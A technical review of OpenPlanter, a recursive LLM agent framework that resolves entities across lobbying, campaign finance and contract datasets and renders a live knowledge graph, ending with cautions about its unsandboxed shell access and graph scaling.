OpenPlanter: A Recursive LLM Agent That Builds Knowledge Graphs While It Investigates
Hook
Most investigative tools make you connect the dots manually. OpenPlanter spawns recursive sub-agents that hunt for entity relationships in parallel, rendering a knowledge graph in real time as they discover connections you didn’t know to look for.
Context
Investigative work—whether you’re a journalist tracking lobbying influence, a compliance officer conducting due diligence, or a researcher mapping corporate networks—involves wrestling with heterogeneous datasets that rarely talk to each other. Campaign finance records use one naming convention, corporate registries another, lobbying disclosures a third. Manual entity resolution across these silos is tedious and error-prone. You might spend hours cross-referencing a vendor name in government contracts against lobbying registrations, only to miss a subsidiary relationship buried three datasets away.
OpenPlanter treats investigation as a code execution problem. It’s a recursive language model agent that operates autonomously across your datasets with 19 tools spanning file I/O, shell execution, web search via Exa, and—critically—the ability to spawn sub-agents. Point it at a directory of CSVs, PDFs, and scraped HTML, give it an objective like “flag vendors who both received federal contracts and employed registered lobbyists,” and it decomposes the work into parallelizable subtasks. Each sub-agent resolves entities, validates findings against acceptance criteria, and writes evidence-backed wiki documents. Meanwhile, a Tauri desktop app renders discovered entities and relationships as an interactive Cytoscape.js knowledge graph, updating in real time as the investigation progresses.
Technical Insight
The architecture rests on two pillars: a Python agent runtime with recursive delegation, and a Rust/TypeScript desktop shell that visualizes the agent’s evolving mental model.
The agent core implements a standard observe-think-act loop with tool calls, but the subtask and execute tools enable recursive decomposition. When the agent encounters a complex objective—say, cross-referencing three datasets for entity overlaps—it can spawn a sub-agent with its own scoped workspace, acceptance criteria, and independent verification steps. This is more powerful than simple chaining because sub-agents inherit the full 19-tool capability set. They can run shell scripts to normalize datasets, use web_search to disambiguate entities via public records, and write structured findings with write_file before returning control. The parent agent reviews artifacts via list_artifacts and read_artifact, then decides whether to accept the subtask result or refine the criteria.
Here’s how you’d launch a headless investigation from the CLI:
openplanter-agent \
--workspace ./lobbying-investigation \
--provider anthropic \
--model claude-opus-4-6 \
--task "Identify companies that received DoD contracts exceeding $1M in 2024 and cross-reference against federal lobbying disclosures. For matches, document the lobbying firm, issue areas, and expenditure timeline. Flag overlaps where contract award date falls within 90 days of lobbying activity on defense appropriations."
The agent might decompose this into three subtasks: (1) parse and normalize the contract dataset, (2) parse lobbying disclosures and build an entity index, (3) perform fuzzy matching and temporal correlation. Each subtask runs independently, writing intermediate artifacts that the parent agent synthesizes into a final wiki document with entity relationships.
The desktop app (Tauri 2 with a Vite frontend) provides three synchronized panes. The chat pane streams the agent’s reasoning with syntax-highlighted tool calls—you see exactly which run_shell commands it executes or which files it reads. The knowledge graph pane renders entities as color-coded nodes (corporate entities in blue, campaign finance in green, lobbying in orange, etc.) with edges representing discovered relationships. Cytoscape.js handles the visualization with multiple layout algorithms—force-directed for general exploration, hierarchical for tracing influence chains, circular for highlighting cluster structures. Click a source node and a drawer slides out with the full markdown wiki document, complete with internal [[wiki links]] that navigate the graph and focus related nodes.
Multi-provider support is table stakes, but the Ollama integration deserves attention. Local models eliminate API costs and latency for iterative exploration, though the README warns about a 120-second first-byte timeout to handle model loading into memory. In practice, this means your first query to a cold Ollama instance might hang for two minutes while it loads llama3.2 into RAM, but subsequent requests are fast. For sensitive investigations involving non-public data, running entirely local with Ollama avoids sending your datasets to third-party APIs.
The toolset reflects real investigative workflows. Beyond standard file operations, hashline_edit and apply_patch enable programmatic dataset transformations without rewriting entire files—critical when you’re working with multi-gigabyte CSVs. Background shell execution (run_shell_bg, check_shell_bg, kill_shell_bg) lets the agent kick off long-running analysis scripts while continuing other subtasks. The web_search tool via Exa pulls public records for entity verification, which is essential when campaign finance data misspells a corporate name or uses a DBA instead of the legal entity.
Session persistence is automatic—the desktop app saves investigation state so you can close the window and resume later without losing the knowledge graph or agent context. A background wiki curator agent runs asynchronously to maintain cross-references and consistency across documents as the investigation evolves, though the README doesn’t detail its update logic.
Gotcha
OpenPlanter ships as a framework, not a dataset. The README is explicit: you must bring your own corporate registries, campaign finance records, lobbying disclosures, and government contracts. There are no built-in scrapers, no sample datasets, no wizards to pull from OpenSecrets or FEC APIs. If you’re starting from zero, expect to spend significant time acquiring and cleaning source data before you can investigate anything.
The bigger concern is the security model—or lack thereof. The agent has unrestricted shell execution (run_shell) and file I/O across your entire workspace. In recursive mode, sub-agents inherit these capabilities. Point it at a workspace with untrusted datasets or malicious scripts, and you’ve handed a language model root-level autonomy over your filesystem. The README includes no sandboxing documentation, no discussion of tool restriction policies, and no guidance on constraining agent behavior in multi-tenant environments. This is a tool for sophisticated users who understand the risks of autonomous code execution and can architect appropriate safeguards.
Graph visualization may face scaling challenges. While Cytoscape.js handles hundreds of nodes gracefully, large investigations with many entities and complex relationship networks could strain the interface despite available filtering options. If your investigation surfaces a very large number of entities with thousands of relationships, you may need to spend time managing layout algorithms and filters. There’s no mention of graph database backends (Neo4j, etc.) for handling enterprise-scale entity networks.
Verdict
Use OpenPlanter if you’re conducting complex investigative research that benefits from autonomous entity resolution across multiple datasets—think journalism on corporate influence networks, compliance due diligence on vendor relationships, or research mapping lobbying ecosystems. The recursive agent architecture excels at decomposing multi-faceted investigations that would take days of manual cross-referencing. The live knowledge graph is genuinely useful for surfacing non-obvious connections, and multi-provider support (especially local Ollama) provides flexibility for both cost and data sensitivity. Skip it if you need a simple dataset viewer, lack the expertise to safely constrain autonomous shell execution, require deterministic and auditable analysis pipelines rather than LLM-driven exploration, or expect turnkey functionality without bringing your own data sources. This is a power tool for users who can critically evaluate agent outputs and architect appropriate guardrails around autonomous code execution.